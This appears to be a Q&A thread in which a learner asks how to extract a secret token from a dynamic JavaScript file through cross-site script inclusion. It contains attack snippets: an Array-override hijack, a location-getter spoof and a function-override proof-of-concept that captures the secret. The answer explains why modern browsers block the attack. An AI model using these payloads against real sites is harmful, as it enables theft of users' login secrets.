# How to get JS content fron XSSI vulnerability?

Tags: javascript, xssi

I'm learning about XSSI attacks and I'm wondering if the following dynamic JS  can be used to access the content.

Dinamic.js:

```
if (window.location.hostname === 'Demo.site.com' ){
    updateLoginHeader('Nick', 'IWANT-THIS-SECRET'); }
```

Can the attacker retrieve IWANT-THIS-SECRET using javascript tag? I was trying something like:

```
<script type="text/javascript">
var secrets;

Array = function() {
  secrets = this;
};
</script>

<script src="https://example.com/Dinamic.js" 
  type="text/javascript"></script>

<script type="text/javascript">

  var yourData = '';
  var i = -1;
  while(secrets[++i]) {
    yourData += secrets[i] + ' ';
  }

  alert('I stole your data: ' + yourData);
</script>
```

Any ideas to retrieve IWANT-THIS-SECRET?

Comment: Is XSSI a simple misspelling of XSS, or do you mean something different?

Comment: I don't get where the secret is stored. Is it like constant argument of the updateLoginHeader call?

Answer (score 3, accepted):

For a successful [cross-site script inclusion attack](https://www.scip.ch/en/?labs.20160414) you'd have to bypass this origin check:

```
if (window.location.hostname === 'Demo.site.com')
```

That isn't possible because modern browsers don't allow you to override `window.location`, as explained [here](https://stackoverflow.com/a/16462316/5765873) and [here](https://stackoverflow.com/questions/6478617/is-it-possible-to-overwrite-window-location-function-with-a-custom-function). The `hostname` property is read-only for security reasons. This means that only `Demo.site.com` can access the `IWANT-THIS-SECRET` token by executing the JS file.

In older browsers, a redefinition of the property could have looked like this:

```
window.__defineGetter__("location", function(){
    return { hostname: "attacker.exmaple" }
});
```

But if you attempt that, you'll get an error message. E.g., for Firefox:

```
TypeError: can't redefine non-configurable property "location"
```

If you *were* able to bypass the origin check, a simple XSSI attack could then work like this:

```
<script>
function updateLoginHeader() {
    alert(arguments[1]);
}
</script>
<script src="https://targetsite.example/Dinamic.js"></script>
```

As you can see, you just have to define your own function that captures the "secret" function argument. (Your attempt to redefine `Array` looks more like an approach to JSON hijacking which isn't helpful here and would also generally be unsuccessful in any modern browser.)

Comment: I was trying to use your scripting and using a valid location(For testing) but I can't get the content either.

Comment: @pancho Could you add the script you tested with to your question?

Comment: I was trying

`<script>
function updateLoginHeader() {
    alert(arguments[1]);
}
</script>
<script src="https://targetsite.example/Dinamic.js"></script>`

Firefox sent "ReferenceError: updateLoginHeader is not defined"

Comment: @pancho Well, the script defines a global function `updateLoginHeader` so it's not plausible that Firefox treats it as undefined. This exact example (obviously with a valid link instead of `targetsite.example`) works fine for me.